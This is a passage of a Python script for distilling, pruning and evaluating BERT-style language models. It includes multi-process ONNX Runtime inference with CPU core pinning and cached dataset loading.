and global_step % args.eval_and_save_steps == 0
):
# evaluate
results, _, _ = evaluate(args, args.task_name, model, tokenizer, use_tqdm=False)
for key, value in results.items():
logs[f"eval_{key}"] = value
logger.info(json.dumps({**logs, **{"step": global_step}}))
# save
if args.save_only_best:
output_dirs = []
else:
output_dirs = [os.path.join(args.output_dir, f"checkpoint-{global_step}")]
curr_val_metric = results[task_metrics[args.task_name]]
if best_val_metric is None or curr_val_metric > best_val_metric:
# check if best model so far
logger.info("Congratulations, best model so far!")
output_dirs.append(os.path.join(args.output_dir, "checkpoint-best"))
best_val_metric = curr_val_metric
for output_dir in output_dirs:
# in each dir, save model, tokenizer, args, optimizer, scheduler
if not os.path.exists(output_dir):
os.makedirs(output_dir)
model_to_save = (
model.module if hasattr(model, "module") else model
) # Take care of distributed/parallel training
logger.info("Saving model checkpoint to %s", output_dir)
model_to_save.save_pretrained(output_dir)
tokenizer.save_pretrained(output_dir)
torch.save(args, os.path.join(output_dir, "training_args.bin"))
torch.save(optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt"))
torch.save(scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt"))
logger.info("\tSaved model checkpoint to %s", output_dir)
if args.max_steps > 0 and global_step >= args.max_steps:
epoch_iterator.close()
break
if args.max_steps > 0 and global_step >= args.max_steps:
# train_iterator.close()
break
return global_step, tr_loss / global_step
def distill(args, train_dataset, teacher_model, student_model, tokenizer):
""" Train the model with distillation
Assumes that teacher and student models share same token embedding layer.
So, the same data is loaded and fed to both teacher and student models.
This function code is base on TinyBERT implementation
(https://github.com/huawei-noah/Pretrained-Language-Model/tree/master/TinyBERT).
"""
############################################################################################
# no multi-node distributed trainig, continued training and fp16 support for KD
############################################################################################
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_sampler = RandomSampler(train_dataset) # no multi-node
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1
else: # number of training steps = number of epochs * number of batches
t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
num_warmup_steps = int(args.warmup_ratio * t_total)
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in student_model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{"params": [p for n, p in student_model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=num_warmup_steps, num_training_steps=t_total
)
# layer numbers of teacher and student
teacher_layer_num = teacher_model.config.num_hidden_layers
student_layer_num = student_model.config.num_hidden_layers
# multi-gpu training
if args.n_gpu > 1:
teacher_model = torch.nn.DataParallel(teacher_model)
student_model = torch.nn.DataParallel(student_model)
# Prepare loss functions
loss_mse = MSELoss()
loss_cs = CosineSimilarity(dim=2)
loss_cs_att = CosineSimilarity(dim=3)
def soft_cross_entropy(predicts, targets):
student_likelihood = torch.nn.functional.log_softmax(predicts, dim=-1)
targets_prob = torch.nn.functional.softmax(targets, dim=-1)
return (- targets_prob * student_likelihood).sum(dim=-1).mean()
# Distill!
logger.info("***** Running distillation training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size)
logger.info(
" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size
* args.gradient_accumulation_steps
* (torch.distributed.get_world_size() if args.local_rank != -1 else 1),
)
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
global_step = 0
epochs_trained = 0
steps_trained_in_current_epoch = 0
# Check if continuing training from a checkpoint
if os.path.exists(args.model_name_or_path):
# set global_step to global_step of last saved checkpoint from model path
try:
global_step = int(args.model_name_or_path.split("-")[-1].split("/")[0])
except ValueError:
global_step = 0
epochs_trained = global_step // (len(train_dataloader) // args.gradient_accumulation_steps)
steps_trained_in_current_epoch = global_step % (len(train_dataloader) // args.gradient_accumulation_steps)
logger.info(" Continuing training from checkpoint, will skip to saved global_step")
logger.info(" Continuing training from epoch %d", epochs_trained)
logger.info(" Continuing training from global step %d", global_step)
logger.info(" Will skip the first %d steps in the first epoch", steps_trained_in_current_epoch)
tr_loss, logging_loss = 0.0, 0.0
tr_att_loss = 0.
tr_rep_loss = 0.
tr_cls_loss = 0.
student_model.zero_grad()
train_iterator = range(epochs_trained, int(args.num_train_epochs))
set_seed(args) # Added here for reproductibility
best_val_metric = None
for epoch_n in train_iterator:
tr_att_loss = 0.
tr_rep_loss = 0.
tr_cls_loss = 0.
epoch_iterator = tqdm(train_dataloader, desc=f"Epoch {epoch_n}", disable=args.local_rank not in [-1, 0])
for step, batch in enumerate(epoch_iterator):
att_loss = 0.
rep_loss = 0.
cls_loss = 0.
# Skip past any already trained steps if resuming training
if steps_trained_in_current_epoch > 0:
steps_trained_in_current_epoch -= 1
continue
student_model.train()
batch = tuple(t.to(args.device) for t in batch)
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2] if args.model_type in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
# student model output
outputs_student = student_model(output_attentions=True, output_hidden_states=True, **inputs)
# teacher model output
teacher_model.eval() # set teacher as eval mode
with torch.no_grad():
outputs_teacher = teacher_model(output_attentions=True, output_hidden_states=True, **inputs)
# Knowledge Distillation loss
# 1) logits distillation
kd_loss = soft_cross_entropy(outputs_student[1], outputs_teacher[1])
loss = kd_loss
tr_cls_loss += loss.item()
# 2) embedding and last hidden state distillation
if args.state_loss_ratio > 0.0:
teacher_reps = outputs_teacher[2]
student_reps = outputs_student[2]
new_teacher_reps = [teacher_reps[0], teacher_reps[teacher_layer_num]]
new_student_reps = [student_reps[0], student_reps[student_layer_num]]
for student_rep, teacher_rep in zip(new_student_reps, new_teacher_reps):
# cosine similarity loss
if args.state_distill_cs:
tmp_loss = 1.0 - loss_cs(student_rep, teacher_rep).mean()
# MSE loss
else:
tmp_loss = loss_mse(student_rep, teacher_rep)
rep_loss += tmp_loss
loss += args.state_loss_ratio * rep_loss
tr_rep_loss += rep_loss.item()
# 3) Attentions distillation
if args.att_loss_ratio > 0.0:
teacher_atts = outputs_teacher[3]
student_atts = outputs_student[3]
assert teacher_layer_num == len(teacher_atts)
assert student_layer_num == len(student_atts)
assert teacher_layer_num % student_layer_num == 0
layers_per_block = int(teacher_layer_num / student_layer_num)
new_teacher_atts = [teacher_atts[i * layers_per_block + layers_per_block - 1]
for i in range(student_layer_num)]
for student_att, teacher_att in zip(student_atts, new_teacher_atts):
student_att = torch.where(student_att <= -1e2, torch.zeros_like(student_att).to(args.device),
student_att)
teacher_att = torch.where(teacher_att <= -1e2, torch.zeros_like(teacher_att).to(args.device),
teacher_att)
tmp_loss = 1.0 - loss_cs_att(student_att, teacher_att).mean()
att_loss += tmp_loss
loss += args.att_loss_ratio * att_loss
tr_att_loss += att_loss.item()
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
# back propagate
loss.backward()
tr_loss += loss.item()
epoch_iterator.set_description(f"Epoch {epoch_n} loss: {loss:.3f}")
if (step + 1) % args.gradient_accumulation_steps == 0:
torch.nn.utils.clip_grad_norm_(student_model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
student_model.zero_grad()
global_step += 1
# change to evaluation mode
student_model.eval()
results = None
logs = {}
if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:
if (
args.local_rank == -1 and args.log_evaluate_during_training and results is None
): # Only evaluate when single GPU otherwise metrics may not average well
results, _, _ = evaluate(args, args.task_name, student_model, tokenizer, use_tqdm=False)
for key, value in results.items():
eval_key = "eval_{}".format(key)
logs[eval_key] = value
cls_loss = tr_cls_loss / (step + 1)
att_loss = tr_att_loss / (step + 1)
rep_loss = tr_rep_loss / (step + 1)
loss_scalar = (tr_loss - logging_loss) / args.logging_steps
learning_rate_scalar = scheduler.get_last_lr()[0]
logs["learning_rate"] = learning_rate_scalar
logs["avg_loss_since_last_log"] = loss_scalar
logs['cls_loss'] = cls_loss
logs['att_loss'] = att_loss
logs['rep_loss'] = rep_loss
logging_loss = tr_loss
logging.info(json.dumps({**logs, **{"step": global_step}}))
if (
args.local_rank in [-1, 0]
and args.eval_and_save_steps > 0
and global_step % args.eval_and_save_steps == 0
):
# evaluate
results, _, _ = evaluate(args, args.task_name, student_model, tokenizer, use_tqdm=False)
for key, value in results.items():
logs[f"eval_{key}"] = value
logger.info(json.dumps({**logs, **{"step": global_step}}))
# save
if args.save_only_best:
output_dirs = []
else:
output_dirs = [os.path.join(args.output_dir, f"checkpoint-{global_step}")]
curr_val_metric = results[task_metrics[args.task_name]]
if best_val_metric is None or curr_val_metric > best_val_metric or args.save_latest:
# check if best model so far
logger.info("Congratulations, best model so far!")
output_dirs.append(os.path.join(args.output_dir, "checkpoint-best"))
best_val_metric = curr_val_metric
for output_dir in output_dirs:
# in each dir, save model, tokenizer, args, optimizer, scheduler
if not os.path.exists(output_dir):
os.makedirs(output_dir)
model_to_save = (
student_model.module if hasattr(student_model, "module") else student_model
) # Take care of distributed/parallel training
logger.info("Saving model checkpoint to %s", output_dir)
model_to_save.save_pretrained(output_dir)
tokenizer.save_pretrained(output_dir)
torch.save(args, os.path.join(output_dir, "training_args.bin"))
torch.save(optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt"))
torch.save(scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt"))
logger.info("\tSaved model checkpoint to %s", output_dir)
# change student model back to train mode
student_model.train()
if args.max_steps > 0 and global_step >= args.max_steps:
epoch_iterator.close()
break
if args.max_steps > 0 and global_step >= args.max_steps:
# train_iterator.close()
break
return global_step, tr_loss / global_step
def evaluate(args, task_name, model, tokenizer, split="dev", prefix="", use_tqdm=True):
results = {}
if task_name == "record":
eval_dataset, eval_answers = load_and_cache_examples(args, task_name, tokenizer, split=split)
else:
eval_dataset = load_and_cache_examples(args, task_name, tokenizer, split=split)
eval_answers = None
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
if args.fp16:
model.half()
args.eval_batch_size = args.per_instance_eval_batch_size * max(1, args.n_gpu)
# Note that DistributedSampler samples randomly
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# multi-gpu eval
if args.n_gpu > 1 and not isinstance(model, torch.nn.DataParallel):
model = torch.nn.DataParallel(model)
# Eval!
logger.info(f"***** Running evaluation: {prefix} on {task_name} {split} *****")
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
preds = None
out_label_ids = None
ex_ids = None
eval_dataloader = tqdm(eval_dataloader, desc="Evaluating") if use_tqdm else eval_dataloader
for batch in eval_dataloader:
model.eval()
batch = tuple(t.to(args.device) for t in batch)
guids = batch[-1]
max_seq_length = batch[0].size(1)
if args.use_fixed_seq_length: # no dynamic sequence length
batch_seq_length = max_seq_length
else:
batch_seq_length = torch.max(batch[-2], 0)[0].item()
if batch_seq_length < max_seq_length:
inputs = {"input_ids": batch[0][:,:batch_seq_length].contiguous(),
"attention_mask": batch[1][:,:batch_seq_length].contiguous(),
"labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2][:,:batch_seq_length].contiguous() if args.model_type
in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
else:
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2] if args.model_type in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
with torch.no_grad():
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
ex_ids = [guids.detach().cpu().numpy()]
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
ex_ids.append(guids.detach().cpu().numpy())
ex_ids = np.concatenate(ex_ids, axis=0)
eval_loss = eval_loss / nb_eval_steps
if args.output_mode in ["classification", "span_classification"] and args.task_name not in ["record"]:
preds = np.argmax(preds, axis=1)
elif args.output_mode == "regression":
preds = np.squeeze(preds)
if split != "test":
# don't have access to test labels, so skip evaluating on them
# NB(AW): forcing evaluation on ReCoRD on test (no labels) will error
result = compute_metrics(task_name, preds, out_label_ids, guids=ex_ids, answers=eval_answers)
results.update(result)
output_eval_file = os.path.join(args.output_dir, prefix, "eval_results.txt")
with open(output_eval_file, "w") as writer:
logger.info(f"***** {split} results: {prefix} *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
return results, preds, ex_ids
def sort_by_importance(weight, bias, importance, num_instances, stride):
importance_ordered = []
i = 0
for heads in importance:
heappush(importance_ordered, (-heads, i))
i += 1
sorted_weight_to_concat = None
sorted_bias_to_concat = None
i = 0
while importance_ordered and i < num_instances:
head_to_add = heappop(importance_ordered)[1]
if sorted_weight_to_concat is None:
sorted_weight_to_concat = (weight.narrow(0, int(head_to_add * stride), int(stride)), )
else:
sorted_weight_to_concat += (weight.narrow(0, int(head_to_add * stride), int(stride)), )
if bias is not None:
if sorted_bias_to_concat is None:
sorted_bias_to_concat = (bias.narrow(0, int(head_to_add * stride), int(stride)), )
else:
sorted_bias_to_concat += (bias.narrow(0, int(head_to_add * stride), int(stride)), )
i += 1
return torch.cat(sorted_weight_to_concat), torch.cat(sorted_bias_to_concat) if sorted_bias_to_concat is not None else None
def prune_rewire(args, task_name, model, tokenizer, prefix="", use_tqdm=True):
split="dev"
results = {}
if args.n_gpu > 1:
args.n_gpu = 1 # only 1 GPU is supported for pruning
args.device = 0
if task_name == "record":
eval_dataset, eval_answers = load_and_cache_examples(args, task_name, tokenizer, split=split)
else:
eval_dataset = load_and_cache_examples(args, task_name, tokenizer, split=split)
eval_answers = None
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
args.eval_batch_size = args.per_instance_eval_batch_size * max(1, args.n_gpu)
# Note that DistributedSampler samples randomly
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# multi-gpu eval
if args.n_gpu > 1 and not isinstance(model, torch.nn.DataParallel):
model = torch.nn.DataParallel(model)
# get the model ffn weights and biases
inter_weights = torch.zeros(model.config.num_hidden_layers, model.config.intermediate_size, model.config.hidden_size).to(args.device)
inter_biases = torch.zeros(model.config.num_hidden_layers, model.config.intermediate_size).to(args.device)
output_weights = torch.zeros(model.config.num_hidden_layers, model.config.hidden_size, model.config.intermediate_size).to(args.device)
layers = model.base_model.encoder.layer
head_importance = torch.zeros(model.config.num_hidden_layers, model.config.num_attention_heads).to(args.device)
ffn_importance = torch.zeros(model.config.num_hidden_layers, model.config.intermediate_size).to(args.device)
for layer_num in range(model.config.num_hidden_layers):
inter_weights[layer_num] = layers._modules[str(layer_num)].intermediate.dense.weight.detach().to(args.device)
inter_biases[layer_num] = layers._modules[str(layer_num)].intermediate.dense.bias.detach().to(args.device)
output_weights[layer_num] = layers._modules[str(layer_num)].output.dense.weight.detach().to(args.device)
head_mask = torch.ones(model.config.num_hidden_layers, model.config.num_attention_heads).to(args.device)
head_mask.requires_grad_(requires_grad=True)
# Eval!
logger.info(f"***** Running evaluation: {prefix} on {task_name} {split} *****")
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
preds = None
out_label_ids = None
ex_ids = None
eval_dataloader = tqdm(eval_dataloader, desc="Evaluating") if use_tqdm else eval_dataloader
tot_tokens = 0.0
for batch in eval_dataloader:
model.eval()
batch = tuple(t.to(args.device) for t in batch)
guids = batch[-1]
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2] if args.model_type in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
outputs = model(output_attentions=True, **inputs, head_mask=head_mask)
tmp_eval_loss, logits = outputs[:2]
eval_loss += tmp_eval_loss.mean().item()
# TODO accumulate? absolute value sum?
tmp_eval_loss.backward()
# collect attention confidence scores
head_importance += head_mask.grad.abs().detach()
# collect gradients of linear layers
for layer_num in range(model.config.num_hidden_layers):
ffn_importance[layer_num] += torch.abs(
torch.sum(layers._modules[str(layer_num)].intermediate.dense.weight.grad.detach()*inter_weights[layer_num], 1)
+ layers._modules[str(layer_num)].intermediate.dense.bias.grad.detach()*inter_biases[layer_num])
tot_tokens += inputs["attention_mask"].float().detach().sum().data
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
ex_ids = [guids.detach().cpu().numpy()]
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
ex_ids.append(guids.detach().cpu().numpy())
head_importance /= tot_tokens
# Layerwise importance normalization
if not args.dont_normalize_importance_by_layer:
exponent = 2
norm_by_layer = torch.pow(torch.pow(head_importance, exponent).sum(-1), 1 / exponent)
head_importance /= norm_by_layer.unsqueeze(-1) + 1e-20
# rewire the network
head_importance = head_importance.cpu()
ffn_importance = ffn_importance.cpu()
num_heads = model.config.num_attention_heads
head_size = model.config.hidden_size / num_heads
for layer_num in range(model.config.num_hidden_layers):
# load query, key, value weights
query_weight = layers._modules[str(layer_num)].attention.self.query.weight
query_bias = layers._modules[str(layer_num)].attention.self.query.bias
key_weight = layers._modules[str(layer_num)].attention.self.key.weight
key_bias = layers._modules[str(layer_num)].attention.self.key.bias
value_weight = layers._modules[str(layer_num)].attention.self.value.weight
value_bias = layers._modules[str(layer_num)].attention.self.value.bias
# sort query, key, value based on the confidence scores
query_weight, query_bias = sort_by_importance(query_weight,
query_bias,
head_importance[layer_num],
args.target_num_heads,
head_size)
layers._modules[str(layer_num)].attention.self.query.weight = torch.nn.Parameter(query_weight)
layers._modules[str(layer_num)].attention.self.query.bias = torch.nn.Parameter(query_bias)
key_weight, key_bias = sort_by_importance(key_weight,
key_bias,
head_importance[layer_num],
args.target_num_heads,
head_size)
layers._modules[str(layer_num)].attention.self.key.weight = torch.nn.Parameter(key_weight)
layers._modules[str(layer_num)].attention.self.key.bias = torch.nn.Parameter(key_bias)
value_weight, value_bias = sort_by_importance(value_weight,
value_bias,
head_importance[layer_num],
args.target_num_heads,
head_size)
layers._modules[str(layer_num)].attention.self.value.weight = torch.nn.Parameter(value_weight)
layers._modules[str(layer_num)].attention.self.value.bias = torch.nn.Parameter(value_bias)
# output matrix
weight_sorted, _ = sort_by_importance(
layers._modules[str(layer_num)].attention.output.dense.weight.transpose(0, 1),
None,
head_importance[layer_num],
args.target_num_heads,
head_size)
weight_sorted = weight_sorted.transpose(0, 1)
layers._modules[str(layer_num)].attention.output.dense.weight = torch.nn.Parameter(weight_sorted)
weight_sorted, bias_sorted = sort_by_importance(
layers._modules[str(layer_num)].intermediate.dense.weight,
layers._modules[str(layer_num)].intermediate.dense.bias,
ffn_importance[layer_num],
args.target_ffn_dim,
1)
layers._modules[str(layer_num)].intermediate.dense.weight = torch.nn.Parameter(weight_sorted)
layers._modules[str(layer_num)].intermediate.dense.bias = torch.nn.Parameter(bias_sorted)
# ffn output matrix input side
weight_sorted, _ = sort_by_importance(
layers._modules[str(layer_num)].output.dense.weight.transpose(0, 1),
None,
ffn_importance[layer_num],
args.target_ffn_dim,
1)
weight_sorted = weight_sorted.transpose(0, 1)
layers._modules[str(layer_num)].output.dense.weight = torch.nn.Parameter(weight_sorted)
# save pruned model
from pathlib import Path
Path(args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim))).mkdir(exist_ok=True)
model.config.hidden_act = 'relu' # use ReLU activation for the pruned models.
model.config.num_attention_heads = min([num_heads, args.target_num_heads])
model.config.intermediate_size = layers._modules['0'].intermediate.dense.weight.size(0)
model.config.save_pretrained(args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim)))
model.save_pretrained(args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim)))
tokenizer.save_pretrained(args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim)))
ex_ids = np.concatenate(ex_ids, axis=0)
eval_loss = eval_loss / nb_eval_steps
if args.output_mode in ["classification", "span_classification"] and args.task_name not in ["record"]:
preds = np.argmax(preds, axis=1)
elif args.output_mode == "regression":
preds = np.squeeze(preds)
if split != "test":
# don't have access to test labels, so skip evaluating on them
# NB(AW): forcing evaluation on ReCoRD on test (no labels) will error
result = compute_metrics(task_name, preds, out_label_ids, guids=ex_ids, answers=eval_answers)
results.update(result)
output_eval_file = os.path.join(args.output_dir, prefix, "eval_results.txt")
with open(output_eval_file, "w") as writer:
logger.info(f"***** {split} results: {prefix} *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
return results, preds, ex_ids
def get_procfs_path():
"""Return updated psutil.PROCFS_PATH constant."""
"""Copied from psutil code, and modified to fix an error."""
return sys.modules['psutil'].PROCFS_PATH
def cpu_count_physical():
"""Return the number of physical cores in the system."""
"""Copied from psutil code, and modified to fix an error."""
# Method #1 doesn't work for some dual socket topologies.
# # Method #1
# core_ids = set()
# for path in glob.glob(
# "/sys/devices/system/cpu/cpu[0-9]*/topology/core_id"):
# with open_binary(path) as f:
# core_ids.add(int(f.read()))
# result = len(core_ids)
# if result != 0:
# return result
# Method #2
physical_logical_mapping = {}
mapping = {}
current_info = {}
with open('%s/cpuinfo' % get_procfs_path(), "rb") as f:
for line in f:
line = line.strip().lower()
if not line:
# print(current_info)
# new section
if (b'physical id' in current_info and
b'cpu cores' in current_info):
mapping[current_info[b'physical id']] = \
current_info[b'cpu cores']
if (b'physical id' in current_info and
b'core id' in current_info and
b'processor' in current_info):
# print(current_info[b'physical id'] * 1000 + current_info[b'core id'])
if current_info[b'physical id'] * 1000 + current_info[b'core id'] not in physical_logical_mapping:
physical_logical_mapping[current_info[b'physical id'] * 1000 + current_info[b'core id']] = current_info[b'processor']
current_info = {}
else:
# ongoing section
if (line.startswith(b'physical id') or
line.startswith(b'cpu cores') or
line.startswith(b'core id') or
line.startswith(b'processor')):
key, value = line.split(b'\t:', 1)
current_info[key.rstrip()] = int(value.rstrip())
physical_processor_ids = []
for key in sorted(physical_logical_mapping.keys()):
physical_processor_ids.append(physical_logical_mapping[key])
result = sum(mapping.values())
# return result or None # mimic os.cpu_count()
return result, physical_processor_ids
input_queue = Queue()
result_queue = Queue()
def evaluate_ort_parallel(args, task_name, onnx_session_options, tokenizer, split="dev", prefix="", use_tqdm=True):
results = {}
if task_name == "record":
eval_dataset, eval_answers = load_and_cache_examples(args, task_name, tokenizer, split=split)
else:
eval_dataset = load_and_cache_examples(args, task_name, tokenizer, split=split)
eval_answers = None
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
args.eval_batch_size = args.per_instance_eval_batch_size * max(1, args.n_gpu)
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# multi-core eval
# import psutil
# num_cores = psutil.cpu_count(logical=False)
num_cores, processor_list = cpu_count_physical()
# print(processor_list)
threads_per_instance = args.threads_per_instance
if args.threads_per_instance < 0:
threads_per_instance = num_cores
num_instances = (int) (num_cores / threads_per_instance)
assert num_instances <= num_cores
def _worker_proc(input_queue, results_q):
from onnxruntime import ExecutionMode, InferenceSession, SessionOptions
onnx_session = InferenceSession(args.model_name_or_path + '/model.onnx', onnx_session_options)
while True:
try:
input = input_queue.get()
if input is None: # exit
break
t0 = time.time()
output = onnx_session.run(None, input[1])
results_q.put((input[0], output, input[2], input[3], time.time() - t0))
except Exception:
output = ExceptionWrapper(
where="in guid {}".format(-1))
results_q.put((-1, output))
assert False
# create processes
for i in range(num_instances):
p = Process(target=_worker_proc, args=(input_queue, result_queue))
p.start()
# pin processes to cores
lpids = ''
for j in range(threads_per_instance):
lpids += str(processor_list[i*threads_per_instance + j])
if j < threads_per_instance - 1:
lpids += ','
os.system("taskset -p -c " + lpids + " " + str(p.pid))
# Eval!
wallclock_start = time.time()
logger.info(f"***** Running evaluation: {prefix} on {task_name} {split} *****")
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
preds = None
out_label_ids = None
ex_ids = None
batch_id = 0
for batch in eval_dataloader:
batch = tuple(t.to(args.device) for t in batch)
guids = batch[-1]
labels_input = batch[3]
batch_seq_length = torch.max(batch[-2], 0)[0].item()
inputs = {'input_ids': batch[0][:,:batch_seq_length].contiguous().cpu().detach().numpy(),
'attention_mask': batch[1][:,:batch_seq_length].contiguous().cpu().detach().numpy()}
if args.model_type in ["bert", "xlnet", "albert"]:
inputs["token_type_ids"] = batch[2][:,:batch_seq_length].contiguous().cpu().detach().numpy()
# Queue queries into the Q which ONNX runtime session can consume
input_queue.put((batch_id, inputs, guids.detach().cpu().numpy(), labels_input.detach().cpu().numpy()))
batch_id += 1
# exit signal at the end of the Q
for _ in range(num_instances):
input_queue.put(None)
# It's a little bit slower with heappush, heappop. So, let's just use PQ.
result_tmp_q = PriorityQueue(batch_id)
while not result_tmp_q.full():
if not result_queue.empty():
output_with_id = result_queue.get()
result_tmp_q.put((output_with_id[0], output_with_id[1:]))
else:
time.sleep(.1)
total_time = 0.
while not result_tmp_q.empty():
output_with_id = result_tmp_q.get()
logits = output_with_id[1][0]
guids = output_with_id[1][1]
input_lables = output_with_id[1][2]
total_time += output_with_id[1][3]
if preds is None:
preds = logits[0]
out_label_ids = input_lables
ex_ids = [guids]
else:
preds = np.append(preds, logits[0], axis=0)
out_label_ids = np.append(out_label_ids, input_lables, axis=0)
ex_ids.append(guids)
assert len(ex_ids) == batch_id
print("############## Average latency: ", str(total_time / batch_id))
print("############## Total time spent (wallclock time): ", str(time.time() - wallclock_start))
ex_ids = np.concatenate(ex_ids, axis=0)
if args.output_mode in ["classification", "span_classification"] and args.task_name not in ["record"]:
preds = np.argmax(preds, axis=1)
elif args.output_mode == "regression":
preds = np.squeeze(preds)
if split != "test":
# don't have access to test labels, so skip evaluating on them
# NB(AW): forcing evaluation on ReCoRD on test (no labels) will error
result = compute_metrics(task_name, preds, out_label_ids, guids=ex_ids, answers=eval_answers)
results.update(result)
output_eval_file = os.path.join(args.output_dir, prefix, "eval_results.txt")
with open(output_eval_file, "w") as writer:
logger.info(f"***** {split} results: {prefix} *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
return results, preds, ex_ids
def load_and_cache_examples(args, task, tokenizer, split="train"):
if args.local_rank not in [-1, 0] and split not in ["dev", "test"]:
torch.distributed.barrier() # Make sure only the first process in distributed training process the dataset, and the others will use the cache
processor = processors[task]()
output_mode = output_modes[task]
# Load data features from cache or dataset file
cached_tensors_file = os.path.join(
args.data_dir,
"tensors_{}_{}_{}_{}_{}".format(
split, list(filter(None, args.model_name_or_path.split("/"))).pop(), str(args.max_seq_length), str(task), str(args.do_lower_case)
),
)
if os.path.exists(cached_tensors_file) and not args.overwrite_cache:
logger.info("Loading tensors from cached file %s", cached_tensors_file)
start_time = time.time()
dataset = torch.load(cached_tensors_file)
logger.info("\tFinished loading tensors")
logger.info(f"\tin {time.time() - start_time}s")
else:
# no cached tensors, process data from scratch
logger.info("Creating features from dataset file at %s", args.data_dir)
label_list = processor.get_labels()
if split == "train":
get_examples = processor.get_train_examples
elif split == "dev":
get_examples = processor.get_dev_examples
elif split == "test":
get_examples = processor.get_test_examples
examples = get_examples(args.data_dir)
features = convert_examples_to_features(
examples,
tokenizer,
label_list=label_list,
max_length=args.max_seq_length,
output_mode=output_mode,
pad_on_left=bool(args.model_type in ["xlnet"]), # pad on the left for xlnet
pad_token=tokenizer.convert_tokens_to_ids([tokenizer.pad_token])[0],
pad_token_segment_id=4 if args.model_type in ["xlnet"] else 0,
)
logger.info("\tFinished creating features")
if args.local_rank == 0 and split not in ["dev", "train"]:
torch.distributed.barrier() # Make sure only the first process in distributed training process the dataset, and the others will use the cache
# Convert to Tensors and build dataset
logger.info("Converting features into tensors")
all_guids = torch.tensor([f.guid for f in features], dtype=torch.long)
